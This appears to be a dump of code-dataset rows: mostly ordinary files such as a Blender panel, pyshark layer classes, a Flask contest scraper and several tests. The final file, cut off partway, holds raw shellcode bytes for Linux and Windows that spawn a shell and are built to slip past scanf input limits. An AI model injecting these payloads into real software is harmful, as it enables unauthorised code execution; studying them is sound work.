repo_name (string, 5-92 chars) | path (string, 4-232 chars) | copies (string, 19 classes) | size (string, 4-7 chars) | content (string, 721-1.04M chars) | license (string, 15 classes) | hash (int64) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class)
---|---|---|---|---|---|---|---|---|---|---
AO-StreetArt/BlenderSync | src/ui/obj_mgmt_ui.py | 1 | 1552 | '''
Copyright (C) 2018 Alex Barry
[email protected]
Created by Alex Barry
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import bpy
# Object Panel
class VIEW_3D_PT_AeselObjectPanel(bpy.types.Panel):
"""Creates an Aesel Object UI Panel"""
bl_label = "Aesel Objects"
bl_idname = "VIEW_3D_PT_aesel_obj_ui"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_category = 'Aesel'
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("object.create_aesel_object")
row = layout.row()
row.operator("object.delete_aesel_object")
row = layout.row()
row.operator("object.lock_aesel_object")
row = layout.row()
row.operator("object.unlock_aesel_object")
row = layout.row()
row.prop(context.scene, 'aesel_auto_updates')
row = layout.row()
row.prop(context.scene, 'aesel_listen_for_updates')
| gpl-3.0 | 3,091,828,068,023,817,000 | 33.488889 | 73 | 0.671392 | false |
lightnarcissus/AnimalNet | browser/Python site-packages/pyshark/packet/layer.py | 1 | 8658 | import os
import binascii
import py
from pyshark.packet.common import Pickleable
class LayerField(object):
"""
Holds all data about a field of a layer, both its actual value and its name and nice representation.
"""
# Note: We use this object with slots and not just a dict because
# it's much more memory-efficient (cuts about a third of the memory).
__slots__ = ['name', 'showname', 'raw_value', 'show', 'hide', 'pos', 'size', 'unmaskedvalue']
def __init__(self, name=None, showname=None, value=None, show=None, hide=None, pos=None, size=None, unmaskedvalue=None):
self.name = name
self.showname = showname
self.raw_value = value
self.show = show
self.pos = pos
self.size = size
self.unmaskedvalue = unmaskedvalue
if hide and hide == 'yes':
self.hide = True
else:
self.hide = False
def __repr__(self):
return '<LayerField %s: %s>' % (self.name, self.get_default_value())
def get_default_value(self):
"""
Gets the best 'value' string this field has.
"""
val = self.show
if not val:
val = self.raw_value
if not val:
val = self.showname
return val
@property
def showname_value(self):
"""
For fields which do not contain a normal value, we attempt to take their value from the showname.
"""
if self.showname and ': ' in self.showname:
return self.showname.split(': ')[1]
@property
def showname_key(self):
if self.showname and ': ' in self.showname:
return self.showname.split(': ')[0]
def __getstate__(self):
ret = {}
for slot in self.__slots__:
ret[slot] = getattr(self, slot)
return ret
def __setstate__(self, data):
for key, val in data.iteritems():
setattr(self, key, val)
@property
def binary_value(self):
"""
Returns the raw value of this field (as a binary string)
"""
return binascii.unhexlify(self.raw_value)
@property
def int_value(self):
"""
Returns the raw value of this field (as an integer).
"""
return int(self.raw_value, 16)
class LayerFieldsContainer(str, Pickleable):
"""
An object which contains one or more fields (of the same name).
When accessing a member such as showname, raw_value, etc., the appropriate member of the main (first) field saved
in this container will be shown.
"""
def __new__(cls, main_field, *args, **kwargs):
obj = str.__new__(cls, main_field.get_default_value(), *args, **kwargs)
obj.fields = [main_field]
return obj
def add_field(self, field):
self.fields.append(field)
@property
def main_field(self):
return self.fields[0]
@property
def alternate_fields(self):
"""
Return the alternate values of this field container (the non-main ones).
"""
return self.fields[1:]
@property
def all_fields(self):
"""
Returns all fields in a list, the main field followed by the alternate fields.
"""
return self.fields
def __getattr__(self, item):
return getattr(self.main_field, item)
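# Editor's note: an illustrative sketch (not part of the original module) of how a
# LayerFieldsContainer combines duplicate fields; the literal values below are made
# up for the example, only the class behaviour defined above is assumed.
#
#   f1 = LayerField(name='ip.src', show='10.0.0.1')
#   f2 = LayerField(name='ip.src', show='10.0.0.2')
#   container = LayerFieldsContainer(f1)
#   container.add_field(f2)
#   str(container)                                # '10.0.0.1' (value of the main field)
#   [f.show for f in container.alternate_fields]  # ['10.0.0.2']
#   container.raw_value                           # delegated to the main field via __getattr__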
class Layer(Pickleable):
"""
An object representing a Packet layer.
"""
DATA_LAYER = 'data'
def __init__(self, xml_obj=None, raw_mode=False):
self.raw_mode = raw_mode
self._layer_name = xml_obj.attrib['name']
self._all_fields = {}
# We copy over all the fields from the XML object
# Note: we don't read lazily from the XML because the lxml objects are very memory-inefficient
# so we'd rather not save them.
for field in xml_obj.findall('.//field'):
attributes = dict(field.attrib)
field_obj = LayerField(**attributes)
if attributes['name'] in self._all_fields:
# Field name already exists, add this field to the container.
self._all_fields[attributes['name']].add_field(field_obj)
else:
self._all_fields[attributes['name']] = LayerFieldsContainer(field_obj)
def __getattr__(self, item):
val = self.get_field(item)
if val is None:
raise AttributeError()
if self.raw_mode:
return val.raw_value
return val
def __dir__(self):
return dir(type(self)) + self.__dict__.keys() + self.field_names
def get_field(self, name):
"""
Gets the XML field object of the given name.
"""
for field_name, field in self._all_fields.items():
if self._sanitize_field_name(name) == self._sanitize_field_name(field_name):
return field
def get_field_value(self, name, raw=False):
"""
Tries getting the value of the given field.
Tries it in the following order: show (standard nice display), value (raw value), showname (extended nice display).
:param name: The name of the field
:param raw: Only return raw value
:return: str of value
"""
field = self.get_field(name)
if field is None:
return
if raw:
return field.raw_value
return field
@property
def _field_prefix(self):
"""
Prefix to field names in the XML.
"""
if self.layer_name == 'geninfo':
return ''
return self.layer_name + '.'
@property
def field_names(self):
"""
Gets all XML field names of this layer.
:return: list of strings
"""
return [self._sanitize_field_name(field_name)
for field_name in self._all_fields]
@property
def layer_name(self):
if self._layer_name == 'fake-field-wrapper':
return self.DATA_LAYER
return self._layer_name
def _sanitize_field_name(self, field_name):
"""
Sanitizes an XML field name (since it might have characters which would make it inaccessible as a python attribute).
"""
field_name = field_name.replace(self._field_prefix, '')
return field_name.replace('.', '_').replace('-', '_').lower()
def __repr__(self):
return '<%s Layer>' % self.layer_name.upper()
def __str__(self):
if self.layer_name == self.DATA_LAYER:
return 'DATA'
s = 'Layer %s:' % self.layer_name.upper() + os.linesep
for field_line in self._get_all_field_lines():
s += field_line
return s
def pretty_print(self):
tw = py.io.TerminalWriter()
if self.layer_name == self.DATA_LAYER:
tw.write('DATA')
return
tw.write('Layer %s:' % self.layer_name.upper() + os.linesep, yellow=True, bold=True)
for field_line in self._get_all_field_lines():
if ':' in field_line:
field_name, field_line = field_line.split(':', 1)
tw.write(field_name + ':', green=True, bold=True)
tw.write(field_line, bold=True)
def _get_all_fields_with_alternates(self):
all_fields = self._all_fields.values()
all_fields += sum([field.alternate_fields for field in all_fields], [])
return all_fields
def _get_all_field_lines(self):
"""
Returns all lines that represent the fields of the layer (both their names and values).
"""
for field in self._get_all_fields_with_alternates():
if field.hide:
continue
if field.showname:
field_repr = field.showname
elif field.show:
field_repr = field.show
else:
continue
yield '\t' + field_repr + os.linesep
def get_field_by_showname(self, showname):
"""
Gets a field by its "showname"
(the name that appears in Wireshark's detailed display i.e. in 'User-Agent: Mozilla...', 'User-Agent' is the
showname)
Returns None if not found.
"""
for field in self._get_all_fields_with_alternates():
if field.showname_key == showname:
# Return it if "XXX: whatever == XXX"
return field
| apache-2.0 | -1,271,595,539,323,519,700 | 30.548872 | 124 | 0.548741 | false |
torquecoder/CPContest-API | contest_api.py | 1 | 7795 | #!/usr/bin/env python3
from flask import Flask, request
from flask_restful import Resource, Api
from bs4 import BeautifulSoup
import requests
from time import strptime,strftime,mktime,gmtime,localtime
import json
import os
app = Flask(__name__)
api = Api(app)
result = []
resultSet = {"present_contests":[],"upcoming_contests":[]}
def get_duration(duration):
days = duration//(60*24)
duration %= 60*24
hours = duration//60
duration %= 60
minutes = duration
ans=""
if days==1: ans+=str(days)+" day "
elif days!=0: ans+=str(days)+" days "
if hours!=0:ans+=str(hours)+"h "
if minutes!=0:ans+=str(minutes)+"m"
return ans.strip()
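# Editor's note: illustrative examples, assuming the integer division used above:
#   get_duration(90) -> "1h 30m"
#   get_duration(1500) -> "1 day 1h"
#   get_duration(2880) -> "2 days"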
# CodeChef Contest Fetching
page = requests.get("http://www.codechef.com/contests").text
soup = BeautifulSoup(page, "html.parser")
statusdiv = soup.findAll("table", attrs = {"class": "dataTable"})
headings = soup.findAll("h3")
contest_tables = {"Future Contests": [], "Present Contests": []}
for i in range(len(headings)):
if headings[i].text != "Past Contests":
contest_tables[headings[i].text] = statusdiv[i].findAll("tr")[1:]
for upcoming_contest in contest_tables["Future Contests"]:
details = upcoming_contest.findAll("td")
start_time = strptime(details[2].text, "%d %b %Y %H:%M:%S")
end_time = strptime(details[3].text, "%d %b %Y %H:%M:%S")
duration = get_duration(int((mktime(end_time) - mktime(start_time)) / 60))
resultSet["upcoming_contests"].append({"Name": details[1].text,
"url": "http://www.codechef.com" + details[1].a["href"],
"StartTime": strftime("%a, %d %b %Y %H:%M", start_time),
"EndTime": strftime("%a, %d %b %Y %H:%M", end_time),
"Duration": duration,
"Platform": "CODECHEF"})
for present_contest in contest_tables["Present Contests"]:
details = present_contest.findAll("td")
end_time = strptime(details[3].text, "%d %b %Y %H:%M:%S")
resultSet["present_contests"].append({"Name": details[1].text,
"url": "http://www.codechef.com" + details[1].a["href"],
"EndTime": strftime("%a, %d %b %Y %H:%M", end_time),
"Platform": "CODECHEF"})
# HackerEarth Contest Fetching
cur_time = localtime()
ref_date = strftime("%Y-%m-%d", localtime(mktime(localtime()) - 432000))
duplicate_check=[]
page = requests.get("https://www.hackerearth.com/chrome-extension/events/")
data = page.json()["response"]
for item in data:
start_time = strptime(item["start_tz"].strip()[:19], "%Y-%m-%d %H:%M:%S")
end_time = strptime(item["end_tz"].strip()[:19], "%Y-%m-%d %H:%M:%S")
duration = get_duration(int(( mktime(end_time)-mktime(start_time) )/60 ))
duplicate_check.append(item["title"].strip())
if item["challenge_type"]=='hiring':challenge_type = 'hiring'
else: challenge_type = 'contest'
if item["status"].strip()=="UPCOMING":
resultSet["upcoming_contests"].append({ "Name" : item["title"].strip() , "url" : item["url"].strip() , "StartTime" : strftime("%a, %d %b %Y %H:%M", start_time),"EndTime" : strftime("%a, %d %b %Y %H:%M", end_time),"Duration":duration,"Platform":"HACKEREARTH","challenge_type": challenge_type })
elif item["status"].strip()=="ONGOING":
resultSet["present_contests"].append({ "Name" : item["title"].strip() , "url" : item["url"].strip() , "EndTime" : strftime("%a, %d %b %Y %H:%M", end_time),"Platform":"HACKEREARTH","challenge_type": challenge_type })
# CodeForces Contest Fetching
page = requests.get("http://codeforces.com/api/contest.list")
data = page.json()["result"]
for item in data:
if item["phase"]=="FINISHED": break
start_time = strftime("%a, %d %b %Y %H:%M",gmtime(item["startTimeSeconds"]+19800))
end_time = strftime("%a, %d %b %Y %H:%M",gmtime(item["durationSeconds"]+item["startTimeSeconds"]+19800))
duration = get_duration(item["durationSeconds"]//60)
if item["phase"].strip()=="BEFORE":
resultSet["upcoming_contests"].append({ "Name" : item["name"] , "url" : "http://codeforces.com/contest/"+str(item["id"]) , "StartTime" : start_time,"EndTime" : end_time,"Duration":duration,"Platform":"CODEFORCES" })
else:
resultSet["present_contests"].append({ "Name" : item["name"] , "url" : "http://codeforces.com/contest/"+str(item["id"]) , "EndTime" : end_time ,"Platform":"CODEFORCES" })
# HackerRank Contest Fetching
hackerrank_contests = {"urls":[]}
cur_time = str(int(mktime(localtime())*1000))
page = requests.get("https://www.hackerrank.com/rest/contests/upcoming?offset=0&limit=10&contest_slug=active&_="+cur_time)
data = page.json()["models"]
for item in data:
if not item["ended"] and ("https://www.hackerrank.com/"+item["slug"]) not in hackerrank_contests["urls"]:
start_time = strptime(item["get_starttimeiso"], "%Y-%m-%dT%H:%M:%SZ")
end_time = strptime(item["get_endtimeiso"], "%Y-%m-%dT%H:%M:%SZ")
duration = get_duration(int(( mktime(end_time)-mktime(start_time) )/60 ))
if not item["started"]:
hackerrank_contests["urls"].append("https://www.hackerrank.com/"+item["slug"])
resultSet["upcoming_contests"].append({ "Name" : item["name"] , "url" : "https://www.hackerrank.com/"+item["slug"] , "StartTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(start_time)+19800)),"EndTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(end_time)+19800)),"Duration":duration,"Platform":"HACKERRANK" })
elif item["started"]:
hackerrank_contests["urls"].append("https://www.hackerrank.com/"+item["slug"])
resultSet["present_contests"].append({ "Name" : item["name"] , "url" : "https://www.hackerrank.com/"+item["slug"] , "EndTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(end_time)+19800)) ,"Platform":"HACKERRANK" })
cur_time = str(int(mktime(localtime())*1000))
page = requests.get("https://www.hackerrank.com/rest/contests/college?offset=0&limit=50&_="+cur_time)
data = page.json()["models"]
for item in data:
if not item["ended"] and ("https://www.hackerrank.com/"+item["slug"]) not in hackerrank_contests["urls"]:
start_time = strptime(item["get_starttimeiso"], "%Y-%m-%dT%H:%M:%SZ")
end_time = strptime(item["get_endtimeiso"], "%Y-%m-%dT%H:%M:%SZ")
duration = get_duration(int(( mktime(end_time)-mktime(start_time) )/60 ))
if not item["started"]:
hackerrank_contests["urls"].append("https://www.hackerrank.com/"+item["slug"])
resultSet["upcoming_contests"].append({ "Name" : item["name"] , "url" : "https://www.hackerrank.com/"+item["slug"] , "StartTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(start_time)+19800)),"EndTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(end_time)+19800)),"Duration":duration,"Platform":"HACKERRANK" })
elif item["started"]:
hackerrank_contests["urls"].append("https://www.hackerrank.com/"+item["slug"])
resultSet["present_contests"].append({ "Name" : item["name"] , "url" : "https://www.hackerrank.com/"+item["slug"] , "EndTime" : strftime("%a, %d %b %Y %H:%M", localtime(mktime(end_time)+19800)) ,"Platform":"HACKERRANK" })
resultSet["upcoming_contests"] = sorted(resultSet["upcoming_contests"], key=lambda k: strptime(k['StartTime'], "%a, %d %b %Y %H:%M"))
resultSet["present_contests"] = sorted(resultSet["present_contests"], key=lambda k: strptime(k['EndTime'], "%a, %d %b %Y %H:%M"))
class TodoSimple(Resource):
def get(self):
return {"result": resultSet}
api.add_resource(TodoSimple, '/')
port = int(os.environ.get("PORT", 5000))
app.run(host='0.0.0.0', port=port)
| mit | -1,658,458,333,064,891,100 | 47.71875 | 338 | 0.612572 | false |
linkhub-sdk/popbill.statement.example.py | deleteFile.py | 1 | 1667 | # -*- coding: utf-8 -*-
# Code for console encoding differences. Don't mind it.
import sys
import imp
imp.reload(sys)
try:
sys.setdefaultencoding('UTF8')
except Exception as E:
pass
import testValue
from popbill import StatementService, PopbillException
statementService = StatementService(testValue.LinkID, testValue.SecretKey)
statementService.IsTest = testValue.IsTest
statementService.IPRestrictOnOff = testValue.IPRestrictOnOff
statementService.UseStaticIP = testValue.UseStaticIP
statementService.UseLocalTimeYN = testValue.UseLocalTimeYN
'''
Deletes a file attached to an electronic statement.
- The FileID that identifies the file can be found in the AttachedFile value
of the attached file list (GetFileList API) response.
- https://docs.popbill.com/statement/python/api#DeleteFile
'''
try:
print("=" * 15 + " 전자명세서 첨부파일 삭제 " + "=" * 15)
# 팝빌회원 사업자번호
CorpNum = testValue.testCorpNum
# 명세서 코드, 121-명세서, 122-청구서, 123-견적서, 124-발주서, 125-입금표, 126-영수증
ItemCode = 121
# 전자명세서 문서번호
MgtKey = "20210429-001"
# 삭제할 FileID, 첨부파일목록(getFiles API) 응답 전문의 attachedFile 값
FileID = "4DB71521-DC61-43EB-A061-DB0987ABACAB.PBF"
# 팝빌회원 아이디
UserID = testValue.testUserID
result = statementService.deleteFile(CorpNum, ItemCode, MgtKey, FileID, UserID)
print("처리결과 : [%d] %s" % (result.code, result.message))
except PopbillException as PE:
print("Exception Occur : [%d] %s" % (PE.code, PE.message))
| mit | -3,472,569,565,934,008,300 | 25.788462 | 83 | 0.719311 | false |
fsimkovic/conkit | conkit/io/tests/test_clustal.py | 1 | 4305 | """Testing facility for conkit.io.clustal"""
__author__ = "Felix Simkovic"
__date__ = "09 Sep 2016"
import os
import unittest
from conkit.io.clustal import ClustalParser
from conkit.io._iotools import create_tmp_f
class TestClustalParser(unittest.TestCase):
def test_read_1(self):
seq = """CLUSTAL W
seq_0 MLDLEVVPE-RSLGNEQW-------E-F-TLG-MPLAQAV-AILQKHC--
seq_0 -RIIKNVQV
"""
f_name = create_tmp_f(content=seq)
parser = ClustalParser()
with open(f_name, 'r') as f_in:
sequence_file = parser.read(f_in)
sequence_entry = sequence_file.top_sequence
ref_id = "seq_0"
self.assertEqual(ref_id, sequence_entry.id)
ref_seq = "MLDLEVVPE-RSLGNEQW-------E-F-TLG-MPLAQAV-AILQKHC---RIIKNVQV"
self.assertEqual(ref_seq, sequence_entry.seq)
os.unlink(f_name)
def test_read_2(self):
msa = """CLUSTAL W
seq_0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
seq_1 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
seq_2 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
**************************************************
seq_0 AAAAAAAAA
seq_1 BBBBBBBBB
seq_2 CCCCCCCCC
*********
"""
f_name = create_tmp_f(content=msa)
parser = ClustalParser()
with open(f_name, 'r') as f_in:
sequence_file = parser.read(f_in)
for i, sequence_entry in enumerate(sequence_file):
if i == 0:
self.assertEqual('seq_0', sequence_entry.id)
self.assertEqual('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', sequence_entry.seq)
elif i == 1:
self.assertEqual('seq_1', sequence_entry.id)
self.assertEqual('BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB', sequence_entry.seq)
elif i == 2:
self.assertEqual('seq_2', sequence_entry.id)
self.assertEqual('CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', sequence_entry.seq)
os.unlink(f_name)
def test_read_3(self):
msa = """CLUSTAL FORMAT for
seq_0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
seq_1 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
seq_2 CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
seq_0 AAAAAAAAA
seq_1 BBBBBBBBB
seq_2 CCCCCCCCC
"""
f_name = create_tmp_f(content=msa)
parser = ClustalParser()
with open(f_name, 'r') as f_in:
sequence_file = parser.read(f_in)
for i, sequence_entry in enumerate(sequence_file):
if i == 0:
self.assertEqual('seq_0', sequence_entry.id)
self.assertEqual('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA', sequence_entry.seq)
elif i == 1:
self.assertEqual('seq_1', sequence_entry.id)
self.assertEqual('BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB', sequence_entry.seq)
elif i == 2:
self.assertEqual('seq_2', sequence_entry.id)
self.assertEqual('CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC', sequence_entry.seq)
os.unlink(f_name)
def test_write_1(self):
seq = [
"CLUSTAL FORMAT written with ConKit",
"",
"seq_0\tAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
"seq_1\tBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",
""
"seq_0\tAAAAAAAAAAAAAAAAAAAAAA",
"seq_1\tBBBBBBBBBBBBBBBBBBBBBB",
]
joinedseq = '\n'.join(seq)
f_name_in = create_tmp_f(content=joinedseq)
f_name_out = create_tmp_f()
parser = ClustalParser()
with open(f_name_in, 'r') as f_in, open(f_name_out, 'w') as f_out:
sequence_file = parser.read(f_in)
parser.write(f_out, sequence_file)
with open(f_name_out, 'r') as f_in:
output = f_in.read().splitlines()
self.assertEqual(seq, output)
map(os.unlink, [f_name_in, f_name_out])
if __name__ == "__main__":
unittest.main(verbosity=2)
| bsd-3-clause | 4,883,339,541,631,436,000 | 36.763158 | 115 | 0.605575 | false |
sc3/cookcountyjail | tests/scraper/test_http.py | 1 | 2309 |
import httpretty
from random import randint
from scraper.http import Http, COOK_COUNTY_JAIL_INMATE_DETAILS_URL, BAD_URL_NETWORK_PROBLEM
INMATE_URL = COOK_COUNTY_JAIL_INMATE_DETAILS_URL + '2014-0118034'
class Test_Http:
@httpretty.activate
def test_get_succeeds(self):
number_of_attempts = 2
expected_text = 'it worked'
ccj_api_requests = {'succeed-attempt': randint(1, number_of_attempts), 'current-attempt': 0}
def fulfill_ccj_api_request(_, uri, headers):
assert uri == INMATE_URL
ccj_api_requests['current-attempt'] += 1
if ccj_api_requests['current-attempt'] == ccj_api_requests['succeed-attempt']:
return 200, headers, expected_text
return 500, headers, 'did not work'
httpretty.register_uri(httpretty.GET, COOK_COUNTY_JAIL_INMATE_DETAILS_URL,
body=fulfill_ccj_api_request)
http = Http()
okay, fetched_contents = http.get(INMATE_URL, number_of_attempts)
assert okay
assert ccj_api_requests['current-attempt'] == ccj_api_requests['succeed-attempt']
assert fetched_contents == expected_text
@httpretty.activate
def test_get_fails_500(self):
number_of_attempts = 2
expected_text = 'did not work'
ccj_api_requests = {'succeed-attempt': number_of_attempts, 'current-attempt': 0}
def fulfill_ccj_api_request(_, uri, headers):
assert uri == INMATE_URL
ccj_api_requests['current-attempt'] += 1
return 500, headers, expected_text
httpretty.register_uri(httpretty.GET, COOK_COUNTY_JAIL_INMATE_DETAILS_URL,
body=fulfill_ccj_api_request)
http = Http()
okay, fetched_contents = http.get(INMATE_URL, number_of_attempts)
assert not okay
assert ccj_api_requests['current-attempt'] == ccj_api_requests['succeed-attempt']
assert fetched_contents['status-code'] == 500
def test_get_fails_no_such_place(self):
inmate_url = 'http://idbvf3ruvfr3ubububufvubeuvdvd2uvuevvgud2bewhde.duucuvcryvgrfvyv'
http = Http()
okay, fetched_contents = http.get(inmate_url)
assert not okay
assert fetched_contents == BAD_URL_NETWORK_PROBLEM
| gpl-3.0 | -4,212,042,254,834,498,000 | 35.078125 | 100 | 0.633175 | false |
mhrivnak/pulp_docker | plugins/pulp_docker/plugins/distributors/metadata.py | 4 | 3684 | import logging
import os
from pulp.server.compat import json
from pulp.plugins.util.metadata_writer import JSONArrayFileContext
from pulp_docker.common import constants
from pulp_docker.plugins.distributors import configuration
_LOG = logging.getLogger(__name__)
class RedirectFileContext(JSONArrayFileContext):
"""
Context manager for generating the docker images file.
"""
def __init__(self, working_dir, conduit, config, repo):
"""
:param working_dir: working directory to create the filelists.xml.gz in
:type working_dir: str
:param conduit: The conduit to get api calls
:type conduit: pulp.plugins.conduits.repo_publish.RepoPublishConduit
:param config: Pulp configuration for the distributor
:type config: pulp.plugins.config.PluginCallConfiguration
:param repo: Pulp managed repository
:type repo: pulp.plugins.model.Repository
"""
self.repo_id = repo.id
metadata_file_path = os.path.join(working_dir,
configuration.get_redirect_file_name(repo))
super(RedirectFileContext, self).__init__(metadata_file_path)
scratchpad = conduit.get_repo_scratchpad()
tag_list = scratchpad.get(u'tags', [])
self.tags = self.convert_tag_list_to_dict(tag_list)
self.registry = configuration.get_repo_registry_id(repo, config)
self.redirect_url = configuration.get_redirect_url(config, repo)
if config.get('protected', False):
self.protected = "true"
else:
self.protected = "false"
def _write_file_header(self):
"""
Write out the beginning of the json file
"""
self.metadata_file_handle.write('{"type":"pulp-docker-redirect","version":1,'
'"repository":"%s","repo-registry-id": "%s",'
'"url":"%s","protected":%s,"images":[' %
(self.repo_id, self.registry, self.redirect_url,
self.protected))
def _write_file_footer(self):
"""
Write out the end of the json file
"""
self.metadata_file_handle.write('],"tags":')
self.metadata_file_handle.write(json.dumps(self.tags))
self.metadata_file_handle.write('}')
def add_unit_metadata(self, unit):
"""
Add the specific metadata for this unit
:param unit: The docker unit to add to the images metadata file
:type unit: pulp.plugins.model.AssociatedUnit
"""
super(RedirectFileContext, self).add_unit_metadata(unit)
image_id = unit.unit_key['image_id']
unit_data = {
'id': image_id
}
string_representation = json.dumps(unit_data)
self.metadata_file_handle.write(string_representation)
def convert_tag_list_to_dict(self, tag_list):
"""
Convert a list of tags to a dictionary with tag as the key and image id as value.
If a single tag is associated with multiple image_ids, they will be overwritten.
Since we make sure this doesn't happen when adding image tags to a repository,
we can safely do the conversion.
:param tag_list: list of dictionaries each containing values for 'tag' and 'image_id' keys
:type tag_list: list of dict
:return: dictionary of tag:image_id
:rtype: dict
"""
tag_dict = {}
for tag in tag_list:
tag_dict[tag[constants.IMAGE_TAG_KEY]] = tag[constants.IMAGE_ID_KEY]
return tag_dict
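# Editor's note: illustrative example, assuming constants.IMAGE_TAG_KEY == 'tag' and
# constants.IMAGE_ID_KEY == 'image_id' (the actual values are not shown in this excerpt):
#   [{'tag': 'latest', 'image_id': 'abc'}, {'tag': 'v1', 'image_id': 'def'}]
# would be converted to {'latest': 'abc', 'v1': 'def'}.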
| gpl-2.0 | 809,476,770,697,796,400 | 36.979381 | 99 | 0.60342 | false |
fishilico/shared | shellcode/shellcode.py | 1 | 8969 | #!/usr/bin/env python
# -*- coding:UTF-8 -*-
# Copyright (c) 2015 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Print or run a shellcode according to the OS currently running
@author: Nicolas Iooss
@license: MIT
"""
import argparse
import ctypes
import ctypes.util
import platform
import re
import sys
# These shellcodes pass scanf constraints (no \n, \0 nor space)
SHELLCODES = {
# 48 bytes
'Linux.arm64':
b'b\x01\x0b\xca\xe3E\x8c\xd2#\xcd\xad\xf2\xe3\xe5\xc5\xf2c\x0e\xed' +
b'\xf2\xe3\x0b\xbf\xa9\xe333\x91`03\xd1ap3\xd1\xe0\x0b\xbf\xa9\xa8' +
b'\x1b\x80\xd2a@\x1b\xd4',
# 36 bytes
'Linux.arm_l':
b"\x01@\x8f\xe2\x14\xff/\xe1hF\x0c8R@\x03K\x03Lm@=\xb4iF\x0b'\x0b" +
b'\xdf/bin//sh',
# 24 bytes
'Linux.x86_32':
b'1\xd2Rh//shh/bin\x89\xe3RS\x89\xe1j\x0bX\xcd\x80',
# 25 bytes
'Linux.x86_64':
b'1\xc0\x99RH\xbb/bin//shST_RWT^\xb0;\x0f\x05',
# 194 bytes
'Windows.x86_32':
b'\xfc\xebv`1\xc0d\x8b@0\x8b@\x0c\x8bX\x0c\x89\xde\xad\x89\xc3\x8bp0' +
b'\xac$\xdf<Ku\xf1\x8bk\x18\x8bE<\x8b\\\x05x\x8d\\\x1d\xf0\x8bK(\x8b' +
b'{0\x01\xef\xe3\xfeI\x8b4\x8f\x01\xee1\xc0\x99\xac\x84\xc0t\x140' +
b'\xc2\xb0\x08\xd1\xeas\x06\x81\xf2x;\xf6\x82\xfe\xc8u\xf2\xeb\xe7;T' +
b'$\x1cu\xd6\x8bs4\x01\xee\x0f\xb7\x04N\x8bs,\x01\xee\x8b\x04\x86' +
b'\x01\xe8\x89D$\x1caP\xc3h\x01cmdjPY)\xcc\x89\xe71\xc0\xf3\xaa\xc1/' +
b'\x08jD\x8dt$D\x89\xe2VRQQj\x10j\x01QQWQ\xb8$\x05\x1az\xe8Y\xff\xff' +
b'\xffj\xff\xadP\xb8vQ\x94\xd8\xe8K\xff\xff\xff1\xc9Q\xb8\xd5\xa5' +
b'\xc9B\xeb\xf1',
# 215 bytes
'Windows.x86_64':
b'\xfc\xeb~UQRVW1\xc0eH\x8b@`H\x8b@\x18H\x8bp\x10H\x8b6H\xadH\x8bh0' +
b'\x8bu<\x83\xc6@\x8bT5HH\x8dT\x15\xff\x8bJ\x19\x8bz!RH\x01\xef\xff' +
b'\xc9x\xfe\x8b4\x8fH\x01\xee1\xc0\x99\xac\x84\xc0t\x140\xc2\xb0\x08' +
b'\xd1\xeas\x06\x81\xf2x;\xf6\x82\xfe\xc8u\xf2\xeb\xe79\xdau\xd6Z' +
b'\x8bz%H\x01\xef\x0f\xb7\x04O\x8br\x1dH\x01\xee\x8b\x04\x86H\x01' +
b'\xe8_^ZY]\xff\xe0h\x01cmdTZ\xc1*\x08H\x83\xe4\xf01\xc9\xb1\x88H)' +
